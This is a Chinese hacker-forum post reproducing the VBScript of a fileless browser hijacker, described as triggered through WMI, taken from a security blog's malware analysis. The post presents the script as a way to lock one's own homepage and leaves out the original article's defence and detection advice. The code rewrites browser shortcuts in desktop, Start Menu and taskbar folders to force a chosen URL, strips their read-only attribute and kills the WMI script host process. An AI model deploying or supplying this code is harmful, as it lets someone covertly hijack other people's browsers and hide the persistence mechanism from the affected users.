搜索
中国白客联盟»论坛 Passion irrigation 基情灌水(Leisure and entertainment) 一段vbs来锁定浏览器主页 - Fileless Browser Hijacker
返回列表 发新帖
查看: 5228|回复: 0

一段vbs来锁定浏览器主页 - Fileless Browser Hijacker

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-5-3 14:02:07 | 显示全部楼层 |阅读模式
From:

http://blog.zemana.com/2016/04/yeabestscc-fileless-browser-hijacker_24.html
---
0x00 简介
vbs脚本,执行后可修改当前系统中常见浏览器的主页
通过wmi定时调用此脚本可实现无文件劫持浏览器主页
原文已给出防御和检测方法,所以此处略
---
0x01 应用
技术不分好坏
我们学习了这个技巧同样可以用来锁定自己的浏览器
vbs代码如下,主页锁定为http://www.baidu.com
  1. Dim objFS
  2. Set objFS = CreateObject("Scripting.FileSystemObject")
  3. On Error Resume Next
  4. Const link = "http://www.baidu.com"
  5. browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
  6. Set BrowserDic = CreateObject("scripting.dictionary")
  7. For Each browser In browsers
  8. BrowserDic.Add LCase(browser), browser
  9. Next
  10. Dim FoldersDic(12)
  11. Set WshShell = CreateObject("Wscript.Shell")
  12. FoldersDic(0) = "C:\Users\Public\Desktop"
  13. FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
  14. FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
  15. FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  16. FoldersDic(4) = "C:\Users\a\Desktop"
  17. FoldersDic(5) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu"
  18. FoldersDic(6) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
  19. FoldersDic(7) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
  20. FoldersDic(8) = "C:\Users\a\AppData\Roaming"
  21. FoldersDic(9) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
  22. FoldersDic(10) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
  23. FoldersDic(11) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
  24. Set fso = CreateObject("Scripting.Filesystemobject")
  25. For i = 0 To UBound(FoldersDic)
  26. For Each file In fso.GetFolder(FoldersDic(i)).Files
  27.   If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
  28.    set oShellLink = WshShell.CreateShortcut(file.Path)
  29.    path = oShellLink.TargetPath
  30.    name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
  31.    If BrowserDic.Exists(LCase(name)) Then
  32.     oShellLink.Arguments = link
  33.     If file.Attributes And 1 Then
  34.      file.Attributes = file.Attributes - 1
  35.     End If
  36.     oShellLink.Save
  37.    End If
  38.   End If
  39. Next
  40. Next
  41. createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0
复制代码

执行后会更改系统中浏览器的主页,如图
2016050312093330600.jpg

---
仅作测试,不许抄作业,后果自负
Browser, 浏览器

相关帖子

过段时间可能会取消签到功能了
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表